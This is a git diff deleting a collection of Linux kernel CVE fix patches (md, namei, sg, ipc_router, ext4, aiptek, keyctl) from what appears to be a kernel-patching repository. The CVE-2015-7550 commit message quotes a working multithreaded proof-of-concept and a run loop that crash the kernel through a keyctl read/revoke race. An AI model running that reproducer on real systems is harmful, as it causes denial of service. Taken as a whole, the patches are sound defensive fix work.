--	 * Make sure we have not raced with another CPU:
--	 */
--	while (curr) {
--		if (match_entries(curr, entry))
--			goto out_unlock;
--
--		prev = curr;
--		curr = curr->next;
--	}
--
--	curr = alloc_entry();
--	if (curr) {
--		*curr = *entry;
--		curr->count = 0;
--		curr->next = NULL;
--		memcpy(curr->comm, comm, TASK_COMM_LEN);
--
--		smp_mb(); /* Ensure that curr is initialized before insert */
--
--		if (prev)
--			prev->next = curr;
--		else
--			*head = curr;
--	}
-- out_unlock:
--	raw_spin_unlock(&table_lock);
--
--	return curr;
--}
--
--/**
-- * timer_stats_update_stats - Update the statistics for a timer.
-- * @timer:	pointer to either a timer_list or a hrtimer
-- * @pid:	the pid of the task which set up the timer
-- * @startf:	pointer to the function which did the timer setup
-- * @timerf:	pointer to the timer callback function of the timer
-- * @comm:	name of the process which set up the timer
-- * @tflags:	The flags field of the timer
-- *
-- * When the timer is already registered, then the event counter is
-- * incremented. Otherwise the timer is registered in a free slot.
-- */
--void timer_stats_update_stats(void *timer, pid_t pid, void *startf,
--			      void *timerf, char *comm, u32 tflags)
--{
--	/*
--	 * It doesn't matter which lock we take:
--	 */
--	raw_spinlock_t *lock;
--	struct entry *entry, input;
--	unsigned long flags;
--
--	if (likely(!timer_stats_active))
--		return;
--
--	lock = &per_cpu(tstats_lookup_lock, raw_smp_processor_id());
--
--	input.timer = timer;
--	input.start_func = startf;
--	input.expire_func = timerf;
--	input.pid = pid;
--	input.flags = tflags;
--
--	raw_spin_lock_irqsave(lock, flags);
--	if (!timer_stats_active)
--		goto out_unlock;
--
--	entry = tstat_lookup(&input, comm);
--	if (likely(entry))
--		entry->count++;
--	else
--		atomic_inc(&overflow_count);
--
-- out_unlock:
--	raw_spin_unlock_irqrestore(lock, flags);
--}
--
--static void print_name_offset(struct seq_file *m, unsigned long addr)
--{
--	char symname[KSYM_NAME_LEN];
--
--	if (lookup_symbol_name(addr, symname) < 0)
--		seq_printf(m, "<%p>", (void *)addr);
--	else
--		seq_printf(m, "%s", symname);
--}
--
--static int tstats_show(struct seq_file *m, void *v)
--{
--	struct timespec64 period;
--	struct entry *entry;
--	unsigned long ms;
--	long events = 0;
--	ktime_t time;
--	int i;
--
--	mutex_lock(&show_mutex);
--	/*
--	 * If still active then calculate up to now:
--	 */
--	if (timer_stats_active)
--		time_stop = ktime_get();
--
--	time = ktime_sub(time_stop, time_start);
--
--	period = ktime_to_timespec64(time);
--	ms = period.tv_nsec / 1000000;
--
--	seq_puts(m, "Timer Stats Version: v0.3\n");
--	seq_printf(m, "Sample period: %ld.%03ld s\n", (long)period.tv_sec, ms);
--	if (atomic_read(&overflow_count))
--		seq_printf(m, "Overflow: %d entries\n", atomic_read(&overflow_count));
--	seq_printf(m, "Collection: %s\n", timer_stats_active ? "active" : "inactive");
--
--	for (i = 0; i < nr_entries; i++) {
--		entry = entries + i;
--		if (entry->flags & TIMER_DEFERRABLE) {
--			seq_printf(m, "%4luD, %5d %-16s ",
--				entry->count, entry->pid, entry->comm);
--		} else {
--			seq_printf(m, " %4lu, %5d %-16s ",
--				entry->count, entry->pid, entry->comm);
--		}
--
--		print_name_offset(m, (unsigned long)entry->start_func);
--		seq_puts(m, " (");
--		print_name_offset(m, (unsigned long)entry->expire_func);
--		seq_puts(m, ")\n");
--
--		events += entry->count;
--	}
--
--	ms += period.tv_sec * 1000;
--	if (!ms)
--		ms = 1;
--
--	if (events && period.tv_sec)
--		seq_printf(m, "%ld total events, %ld.%03ld events/sec\n",
--			   events, events * 1000 / ms,
--			   (events * 1000000 / ms) % 1000);
--	else
--		seq_printf(m, "%ld total events\n", events);
--
--	mutex_unlock(&show_mutex);
--
--	return 0;
--}
--
--/*
-- * After a state change, make sure all concurrent lookup/update
-- * activities have stopped:
-- */
--static void sync_access(void)
--{
--	unsigned long flags;
--	int cpu;
--
--	for_each_online_cpu(cpu) {
--		raw_spinlock_t *lock = &per_cpu(tstats_lookup_lock, cpu);
--
--		raw_spin_lock_irqsave(lock, flags);
--		/* nothing */
--		raw_spin_unlock_irqrestore(lock, flags);
--	}
--}
--
--static ssize_t tstats_write(struct file *file, const char __user *buf,
--			    size_t count, loff_t *offs)
--{
--	char ctl[2];
--
--	if (count != 2 || *offs)
--		return -EINVAL;
--
--	if (copy_from_user(ctl, buf, count))
--		return -EFAULT;
--
--	mutex_lock(&show_mutex);
--	switch (ctl[0]) {
--	case '0':
--		if (timer_stats_active) {
--			timer_stats_active = 0;
--			time_stop = ktime_get();
--			sync_access();
--		}
--		break;
--	case '1':
--		if (!timer_stats_active) {
--			reset_entries();
--			time_start = ktime_get();
--			smp_mb();
--			timer_stats_active = 1;
--		}
--		break;
--	default:
--		count = -EINVAL;
--	}
--	mutex_unlock(&show_mutex);
--
--	return count;
--}
--
--static int tstats_open(struct inode *inode, struct file *filp)
--{
--	return single_open(filp, tstats_show, NULL);
--}
--
--static const struct file_operations tstats_fops = {
--	.open		= tstats_open,
--	.read		= seq_read,
--	.write		= tstats_write,
--	.llseek		= seq_lseek,
--	.release	= single_release,
--};
--
--void __init init_timer_stats(void)
--{
--	int cpu;
--
--	for_each_possible_cpu(cpu)
--		raw_spin_lock_init(&per_cpu(tstats_lookup_lock, cpu));
--}
--
--static int __init init_tstats_procfs(void)
--{
--	struct proc_dir_entry *pe;
--
--	pe = proc_create("timer_stats", 0644, NULL, &tstats_fops);
--	if (!pe)
--		return -ENOMEM;
--	return 0;
--}
--__initcall(init_tstats_procfs);
-diff --git a/kernel/workqueue.c b/kernel/workqueue.c
-index 1d9fb65..072cbc9 100644
---- a/kernel/workqueue.c
-+++ b/kernel/workqueue.c
-@@ -1523,8 +1523,6 @@ static void __queue_delayed_work(int cpu, struct workqueue_struct *wq,
- 		return;
- 	}
- 
--	timer_stats_timer_set_start_info(&dwork->timer);
--
- 	dwork->wq = wq;
- 	dwork->cpu = cpu;
- 	timer->expires = jiffies + delay;
-diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
-index eb9e9a7..132af33 100644
---- a/lib/Kconfig.debug
-+++ b/lib/Kconfig.debug
-@@ -980,20 +980,6 @@ config DEBUG_TIMEKEEPING
- 
- 	  If unsure, say N.
- 
--config TIMER_STATS
--	bool "Collect kernel timers statistics"
--	depends on DEBUG_KERNEL && PROC_FS
--	help
--	  If you say Y here, additional code will be inserted into the
--	  timer routines to collect statistics about kernel timers being
--	  reprogrammed. The statistics can be read from /proc/timer_stats.
--	  The statistics collection is started by writing 1 to /proc/timer_stats,
--	  writing 0 stops it. This feature is useful to collect information
--	  about timer usage patterns in kernel and userspace. This feature
--	  is lightweight if enabled in the kernel config but not activated
--	  (it defaults to deactivated on bootup and will only be activated
--	  if some application like powertop activates it explicitly).
--
- config DEBUG_PREEMPT
- 	bool "Debug preemptible kernel"
- 	depends on DEBUG_KERNEL && PREEMPT && TRACE_IRQFLAGS_SUPPORT
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5697/^4.1/0001.patch b/Patches/Linux_CVEs/CVE-2015-5697/^4.1/0001.patch
deleted file mode 100644
index d230b3aa..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5697/^4.1/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From b6878d9e03043695dbf3fa1caa6dfc09db225b16 Mon Sep 17 00:00:00 2001
-From: Benjamin Randazzo <benjamin@randazzo.fr>
-Date: Sat, 25 Jul 2015 16:36:50 +0200
-Subject: [PATCH] md: use kzalloc() when bitmap is disabled
-
-In drivers/md/md.c get_bitmap_file() uses kmalloc() for creating a
-mdu_bitmap_file_t called "file".
-
-5769         file = kmalloc(sizeof(*file), GFP_NOIO);
-5770         if (!file)
-5771                 return -ENOMEM;
-
-This structure is copied to user space at the end of the function.
-
-5786         if (err == 0 &&
-5787             copy_to_user(arg, file, sizeof(*file)))
-5788                 err = -EFAULT
-
-But if bitmap is disabled only the first byte of "file" is initialized
-with zero, so it's possible to read some bytes (up to 4095) of kernel
-space memory from user space. This is an information leak.
-
-5775         /* bitmap disabled, zero the first byte and copy out */
-5776         if (!mddev->bitmap_info.file)
-5777                 file->pathname[0] = '\0';
-
-Signed-off-by: Benjamin Randazzo <benjamin@randazzo.fr>
-Signed-off-by: NeilBrown <neilb@suse.com>
----
- drivers/md/md.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/md/md.c b/drivers/md/md.c
-index 0c2a4e8b873c6..e25f00f0138a7 100644
---- a/drivers/md/md.c
-+++ b/drivers/md/md.c
-@@ -5759,7 +5759,7 @@ static int get_bitmap_file(struct mddev *mddev, void __user * arg)
- 	char *ptr;
- 	int err;
- 
--	file = kmalloc(sizeof(*file), GFP_NOIO);
-+	file = kzalloc(sizeof(*file), GFP_NOIO);
- 	if (!file)
- 		return -ENOMEM;
- 
diff --git a/Patches/Linux_CVEs/CVE-2015-5706/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-5706/ANY/0001.patch
deleted file mode 100644
index f63b5535..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5706/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From f15133df088ecadd141ea1907f2c96df67c729f0 Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Fri, 8 May 2015 22:53:15 -0400
-Subject: path_openat(): fix double fput()
-
-path_openat() jumps to the wrong place after do_tmpfile() - it has
-already done path_cleanup() (as part of path_lookupat() called by
-do_tmpfile()), so doing that again can lead to double fput().
-
-Cc: stable@vger.kernel.org	# v3.11+
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- fs/namei.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/namei.c b/fs/namei.c
-index f67cf6c..fe30d3b 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -3233,7 +3233,7 @@ static struct file *path_openat(int dfd, struct filename *pathname,
- 
- 	if (unlikely(file->f_flags & __O_TMPFILE)) {
- 		error = do_tmpfile(dfd, pathname, nd, flags, op, file, &opened);
--		goto out;
-+		goto out2;
- 	}
- 
- 	error = path_init(dfd, pathname, flags, nd);
-@@ -3263,6 +3263,7 @@ static struct file *path_openat(int dfd, struct filename *pathname,
- 	}
- out:
- 	path_cleanup(nd);
-+out2:
- 	if (!(opened & FILE_OPENED)) {
- 		BUG_ON(!error);
- 		put_filp(file);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5707/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-5707/ANY/0001.patch
deleted file mode 100644
index d462c86f..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5707/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 451a2886b6bf90e2fb378f7c46c655450fb96e81 Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Sat, 21 Mar 2015 20:08:18 -0400
-Subject: sg_start_req(): make sure that there's not too many elements in iovec
-
-unfortunately, allowing an arbitrary 16bit value means a possibility of
-overflow in the calculation of total number of pages in bio_map_user_iov() -
-we rely on there being no more than PAGE_SIZE members of sum in the
-first loop there.  If that sum wraps around, we end up allocating
-too small array of pointers to pages and it's easy to overflow it in
-the second loop.
-
-X-Coverup: TINC (and there's no lumber cartel either)
-Cc: stable@vger.kernel.org # way, way back
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- drivers/scsi/sg.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index d383f84..b5a4db8 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -1744,6 +1744,9 @@ sg_start_req(Sg_request *srp, unsigned char *cmd)
- 			md->from_user = 0;
- 	}
- 
-+	if (unlikely(iov_count > MAX_UIOVEC))
-+		return -EINVAL;
-+
- 	if (iov_count) {
- 		int size = sizeof(struct iovec) * iov_count;
- 		struct iovec *iov;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5707/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2015-5707/ANY/0002.patch
deleted file mode 100644
index 124912ab..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5707/ANY/0002.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From fdc81f45e9f57858da6351836507fbcf1b7583ee Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Sat, 21 Mar 2015 20:25:30 -0400
-Subject: sg_start_req(): use import_iovec()
-
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- drivers/scsi/sg.c | 16 +++++-----------
- 1 file changed, 5 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index b5a4db8..9d7b7db 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -1744,21 +1744,15 @@ sg_start_req(Sg_request *srp, unsigned char *cmd)
- 			md->from_user = 0;
- 	}
- 
--	if (unlikely(iov_count > MAX_UIOVEC))
--		return -EINVAL;
--
- 	if (iov_count) {
--		int size = sizeof(struct iovec) * iov_count;
--		struct iovec *iov;
-+		struct iovec *iov = NULL;
- 		struct iov_iter i;
- 
--		iov = memdup_user(hp->dxferp, size);
--		if (IS_ERR(iov))
--			return PTR_ERR(iov);
-+		res = import_iovec(rw, hp->dxferp, iov_count, 0, &iov, &i);
-+		if (res < 0)
-+			return res;
- 
--		iov_iter_init(&i, rw, iov, iov_count,
--			      min_t(size_t, hp->dxfer_len,
--				    iov_length(iov, iov_count)));
-+		iov_iter_truncate(&i, hp->dxfer_len);
- 
- 		res = blk_rq_map_user_iov(q, rq, md, &i, GFP_ATOMIC);
- 		kfree(iov);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch
deleted file mode 100644
index 80074c66..00000000
--- a/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch
+++ /dev/null
@@ -1,5 +0,0 @@
-diff --git a/Image.gz-dtb b/Image.gz-dtb
-index afa7ae0..cc18024 100644
---- a/Image.gz-dtb
-+++ b/Image.gz-dtb
-Binary files differ
diff --git a/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch.base64
deleted file mode 100644
index e4224e14..00000000
--- a/Patches/Linux_CVEs/CVE-2015-6619/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL0ltYWdlLmd6LWR0YiBiL0ltYWdlLmd6LWR0YgppbmRleCBhZmE3YWUwLi5jYzE4MDI0IDEwMDY0NAotLS0gYS9JbWFnZS5nei1kdGIKKysrIGIvSW1hZ2UuZ3otZHRiCkJpbmFyeSBmaWxlcyBkaWZmZXIK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch
deleted file mode 100644
index 5c34a971..00000000
--- a/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/kernel/sys.c b/kernel/sys.c
-index f7e7a8b..800c5f2 100644
---- a/kernel/sys.c
-+++ b/kernel/sys.c
-@@ -1934,7 +1934,7 @@
- 			tmp = end;
- 
- 		/* Here vma->vm_start <= start < tmp <= (end|vma->vm_end). */
--		error = prctl_update_vma_anon_name(vma, &prev, start, end,
-+		error = prctl_update_vma_anon_name(vma, &prev, start, tmp,
- 				(const char __user *)arg);
- 		if (error)
- 			return error;
diff --git a/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch.base64
deleted file mode 100644
index 59cf86e6..00000000
--- a/Patches/Linux_CVEs/CVE-2015-6640/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2tlcm5lbC9zeXMuYyBiL2tlcm5lbC9zeXMuYwppbmRleCBmN2U3YThiLi44MDBjNWYyIDEwMDY0NAotLS0gYS9rZXJuZWwvc3lzLmMKKysrIGIva2VybmVsL3N5cy5jCkBAIC0xOTM0LDcgKzE5MzQsNyBAQAogCQkJdG1wID0gZW5kOwogCiAJCS8qIEhlcmUgdm1hLT52bV9zdGFydCA8PSBzdGFydCA8IHRtcCA8PSAoZW5kfHZtYS0+dm1fZW5kKS4gKi8KLQkJZXJyb3IgPSBwcmN0bF91cGRhdGVfdm1hX2Fub25fbmFtZSh2bWEsICZwcmV2LCBzdGFydCwgZW5kLAorCQllcnJvciA9IHByY3RsX3VwZGF0ZV92bWFfYW5vbl9uYW1lKHZtYSwgJnByZXYsIHN0YXJ0LCB0bXAsCiAJCQkJKGNvbnN0IGNoYXIgX191c2VyICopYXJnKTsKIAkJaWYgKGVycm9yKQogCQkJcmV0dXJuIGVycm9yOwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-6642/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-6642/ANY/0001.patch
deleted file mode 100644
index 5ac59d67..00000000
--- a/Patches/Linux_CVEs/CVE-2015-6642/ANY/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 4ad825ba2968666069740c3e80fe31ed3d0e29ba Mon Sep 17 00:00:00 2001
-From: Arun Kumar Neelakantam <aneela@codeaurora.org>
-Date: Wed, 27 Jan 2016 18:46:01 +0530
-Subject: net: ipc_router: fix leak of kernel memory to userspace
-
-The service info structure is allocated with uninitialized memory for the
-max number of services and returns the complete structure to the usersapce
-resulting in the information leak if lookup operation finds less number of
-services than the requested number.
-
-Check the minimum of requested and available services and copy the minimum
-information to the user-space.
-
-CRs-Fixed: 965934
-Change-Id: Ic97f875855fdc6440c1db1d8d0338ee8b03a9d0a
-Signed-off-by: Arun Kumar Neelakantam <aneela@codeaurora.org>
----
- net/ipc_router/ipc_router_socket.c | 17 +++++++++++------
- 1 file changed, 11 insertions(+), 6 deletions(-)
-
-diff --git a/net/ipc_router/ipc_router_socket.c b/net/ipc_router/ipc_router_socket.c
-index b127120..c26993c 100644
---- a/net/ipc_router/ipc_router_socket.c
-+++ b/net/ipc_router/ipc_router_socket.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -496,13 +496,18 @@ static int msm_ipc_router_ioctl(struct socket *sock,
- 
- 		ret = copy_to_user((void *)arg, &server_arg,
- 				   sizeof(server_arg));
--		if (srv_info_sz) {
-+
-+		n = min(server_arg.num_entries_found,
-+			server_arg.num_entries_in_array);
-+
-+		if (ret == 0 && n) {
- 			ret = copy_to_user((void *)(arg + sizeof(server_arg)),
--					   srv_info, srv_info_sz);
--			if (ret)
--				ret = -EFAULT;
--			kfree(srv_info);
-+					   srv_info, n * sizeof(*srv_info));
- 		}
-+
-+		if (ret)
-+			ret = -EFAULT;
-+		kfree(srv_info);
- 		break;
- 
- 	case IPC_ROUTER_IOCTL_BIND_CONTROL_PORT:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-7509/^3.7/0001.patch b/Patches/Linux_CVEs/CVE-2015-7509/^3.7/0001.patch
deleted file mode 100644
index 2aff5f4a..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7509/^3.7/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From c9b92530a723ac5ef8e352885a1862b18f31b2f5 Mon Sep 17 00:00:00 2001
-From: Anatol Pomozov <anatol.pomozov@gmail.com>
-Date: Tue, 18 Sep 2012 13:38:59 -0400
-Subject: ext4: make orphan functions be no-op in no-journal mode
-
-Instead of checking whether the handle is valid, we check if journal
-is enabled. This avoids taking the s_orphan_lock mutex in all cases
-when there is no journal in use, including the error paths where
-ext4_orphan_del() is called with a handle set to NULL.
-
-Signed-off-by: Anatol Pomozov <anatol.pomozov@gmail.com>
-Signed-off-by: "Theodore Ts'o" <tytso@mit.edu>
----
- fs/ext4/namei.c | 7 +++----
- 1 file changed, 3 insertions(+), 4 deletions(-)
-
-diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
-index 37c03b3..8f4bda7 100644
---- a/fs/ext4/namei.c
-+++ b/fs/ext4/namei.c
-@@ -2369,7 +2369,7 @@ int ext4_orphan_add(handle_t *handle, struct inode *inode)
- 	struct ext4_iloc iloc;
- 	int err = 0, rc;
- 
--	if (!ext4_handle_valid(handle))
-+	if (!EXT4_SB(sb)->s_journal)
- 		return 0;
- 
- 	mutex_lock(&EXT4_SB(sb)->s_orphan_lock);
-@@ -2443,8 +2443,7 @@ int ext4_orphan_del(handle_t *handle, struct inode *inode)
- 	struct ext4_iloc iloc;
- 	int err = 0;
- 
--	/* ext4_handle_valid() assumes a valid handle_t pointer */
--	if (handle && !ext4_handle_valid(handle))
-+	if (!EXT4_SB(inode->i_sb)->s_journal)
- 		return 0;
- 
- 	mutex_lock(&EXT4_SB(inode->i_sb)->s_orphan_lock);
-@@ -2463,7 +2462,7 @@ int ext4_orphan_del(handle_t *handle, struct inode *inode)
- 	 * transaction handle with which to update the orphan list on
- 	 * disk, but we still need to remove the inode from the linked
- 	 * list in memory. */
--	if (sbi->s_journal && !handle)
-+	if (!handle)
- 		goto out;
- 
- 	err = ext4_reserve_inode_write(handle, inode, &iloc);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-7515/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2015-7515/3.2/0001.patch
deleted file mode 100644
index 070fe315..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7515/3.2/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 90eb3c037fe3f0f25f01713a92725a8daa2b41f3 Mon Sep 17 00:00:00 2001
-From: Vladis Dronov <vdronov@redhat.com>
-Date: Tue, 1 Dec 2015 13:09:17 -0800
-Subject: Input: aiptek - fix crash on detecting device without endpoints
-
-commit 8e20cf2bce122ce9262d6034ee5d5b76fbb92f96 upstream.
-
-The aiptek driver crashes in aiptek_probe() when a specially crafted USB
-device without endpoints is detected. This fix adds a check that the device
-has proper configuration expected by the driver. Also an error return value
-is changed to more matching one in one of the error paths.
-
-Reported-by: Ralf Spenneberg <ralf@spenneberg.net>
-Signed-off-by: Vladis Dronov <vdronov@redhat.com>
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
-[bwh: Backported to 3.2: adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- drivers/input/tablet/aiptek.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/input/tablet/aiptek.c b/drivers/input/tablet/aiptek.c
-index 6d89fd1..5657018 100644
---- a/drivers/input/tablet/aiptek.c
-+++ b/drivers/input/tablet/aiptek.c
-@@ -1810,6 +1810,14 @@ aiptek_probe(struct usb_interface *intf, const struct usb_device_id *id)
- 	input_set_abs_params(inputdev, ABS_TILT_Y, AIPTEK_TILT_MIN, AIPTEK_TILT_MAX, 0, 0);
- 	input_set_abs_params(inputdev, ABS_WHEEL, AIPTEK_WHEEL_MIN, AIPTEK_WHEEL_MAX - 1, 0, 0);
- 
-+	/* Verify that a device really has an endpoint */
-+	if (intf->altsetting[0].desc.bNumEndpoints < 1) {
-+		dev_err(&intf->dev,
-+			"interface has %d endpoints, but must have minimum 1\n",
-+			intf->altsetting[0].desc.bNumEndpoints);
-+		err = -EINVAL;
-+		goto fail3;
-+	}
- 	endpoint = &intf->altsetting[0].endpoint[0].desc;
- 
- 	/* Go set up our URB, which is called when the tablet receives
-@@ -1852,6 +1860,7 @@ aiptek_probe(struct usb_interface *intf, const struct usb_device_id *id)
- 	if (i == ARRAY_SIZE(speeds)) {
- 		dev_info(&intf->dev,
- 			 "Aiptek tried all speeds, no sane response\n");
-+		err = -EINVAL;
- 		goto fail2;
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-7515/^4.4/0002.patch b/Patches/Linux_CVEs/CVE-2015-7515/^4.4/0002.patch
deleted file mode 100644
index 629f71b4..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7515/^4.4/0002.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8e20cf2bce122ce9262d6034ee5d5b76fbb92f96 Mon Sep 17 00:00:00 2001
-From: Vladis Dronov <vdronov@redhat.com>
-Date: Tue, 1 Dec 2015 13:09:17 -0800
-Subject: [PATCH] Input: aiptek - fix crash on detecting device without
- endpoints
-
-The aiptek driver crashes in aiptek_probe() when a specially crafted USB
-device without endpoints is detected. This fix adds a check that the device
-has proper configuration expected by the driver. Also an error return value
-is changed to more matching one in one of the error paths.
-
-Reported-by: Ralf Spenneberg <ralf@spenneberg.net>
-Signed-off-by: Vladis Dronov <vdronov@redhat.com>
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
----
- drivers/input/tablet/aiptek.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/input/tablet/aiptek.c b/drivers/input/tablet/aiptek.c
-index e7f966da6efa3..78ca44840d60c 100644
---- a/drivers/input/tablet/aiptek.c
-+++ b/drivers/input/tablet/aiptek.c
-@@ -1819,6 +1819,14 @@ aiptek_probe(struct usb_interface *intf, const struct usb_device_id *id)
- 	input_set_abs_params(inputdev, ABS_TILT_Y, AIPTEK_TILT_MIN, AIPTEK_TILT_MAX, 0, 0);
- 	input_set_abs_params(inputdev, ABS_WHEEL, AIPTEK_WHEEL_MIN, AIPTEK_WHEEL_MAX - 1, 0, 0);
- 
-+	/* Verify that a device really has an endpoint */
-+	if (intf->altsetting[0].desc.bNumEndpoints < 1) {
-+		dev_err(&intf->dev,
-+			"interface has %d endpoints, but must have minimum 1\n",
-+			intf->altsetting[0].desc.bNumEndpoints);
-+		err = -EINVAL;
-+		goto fail3;
-+	}
- 	endpoint = &intf->altsetting[0].endpoint[0].desc;
- 
- 	/* Go set up our URB, which is called when the tablet receives
-@@ -1861,6 +1869,7 @@ aiptek_probe(struct usb_interface *intf, const struct usb_device_id *id)
- 	if (i == ARRAY_SIZE(speeds)) {
- 		dev_info(&intf->dev,
- 			 "Aiptek tried all speeds, no sane response\n");
-+		err = -EINVAL;
- 		goto fail3;
- 	}
- 
diff --git a/Patches/Linux_CVEs/CVE-2015-7550/^4.3/0001.patch b/Patches/Linux_CVEs/CVE-2015-7550/^4.3/0001.patch
deleted file mode 100644
index 4a7afa91..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7550/^4.3/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-From b4a1b4f5047e4f54e194681125c74c0aa64d637d Mon Sep 17 00:00:00 2001
-From: David Howells <dhowells@redhat.com>
-Date: Fri, 18 Dec 2015 01:34:26 +0000
-Subject: [PATCH] KEYS: Fix race between read and revoke
-
-This fixes CVE-2015-7550.
-
-There's a race between keyctl_read() and keyctl_revoke().  If the revoke
-happens between keyctl_read() checking the validity of a key and the key's
-semaphore being taken, then the key type read method will see a revoked key.
-
-This causes a problem for the user-defined key type because it assumes in
-its read method that there will always be a payload in a non-revoked key
-and doesn't check for a NULL pointer.
-
-Fix this by making keyctl_read() check the validity of a key after taking
-semaphore instead of before.
-
-I think the bug was introduced with the original keyrings code.
-
-This was discovered by a multithreaded test program generated by syzkaller
-(http://github.com/google/syzkaller).  Here's a cleaned up version:
-
-	#include <sys/types.h>
-	#include <keyutils.h>
-	#include <pthread.h>
-	void *thr0(void *arg)
-	{
-		key_serial_t key = (unsigned long)arg;
-		keyctl_revoke(key);
-		return 0;
-	}
-	void *thr1(void *arg)
-	{
-		key_serial_t key = (unsigned long)arg;
-		char buffer[16];
-		keyctl_read(key, buffer, 16);
-		return 0;
-	}
-	int main()
-	{
-		key_serial_t key = add_key("user", "%", "foo", 3, KEY_SPEC_USER_KEYRING);
-		pthread_t th[5];
-		pthread_create(&th[0], 0, thr0, (void *)(unsigned long)key);
-		pthread_create(&th[1], 0, thr1, (void *)(unsigned long)key);
-		pthread_create(&th[2], 0, thr0, (void *)(unsigned long)key);
-		pthread_create(&th[3], 0, thr1, (void *)(unsigned long)key);
-		pthread_join(th[0], 0);
-		pthread_join(th[1], 0);
-		pthread_join(th[2], 0);
-		pthread_join(th[3], 0);
-		return 0;
-	}
-
-Build as:
-
-	cc -o keyctl-race keyctl-race.c -lkeyutils -lpthread
-
-Run as:
-
-	while keyctl-race; do :; done
-
-as it may need several iterations to crash the kernel.  The crash can be
-summarised as:
-
-	BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
-	IP: [<ffffffff81279b08>] user_read+0x56/0xa3
-	...
-	Call Trace:
-	 [<ffffffff81276aa9>] keyctl_read_key+0xb6/0xd7
-	 [<ffffffff81277815>] SyS_keyctl+0x83/0xe0
-	 [<ffffffff815dbb97>] entry_SYSCALL_64_fastpath+0x12/0x6f
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
-Tested-by: Dmitry Vyukov <dvyukov@google.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: James Morris <james.l.morris@oracle.com>
----
- security/keys/keyctl.c | 18 +++++++++---------
- 1 file changed, 9 insertions(+), 9 deletions(-)
-
-diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
-index fb111eafcb893..1c3872aeed14a 100644
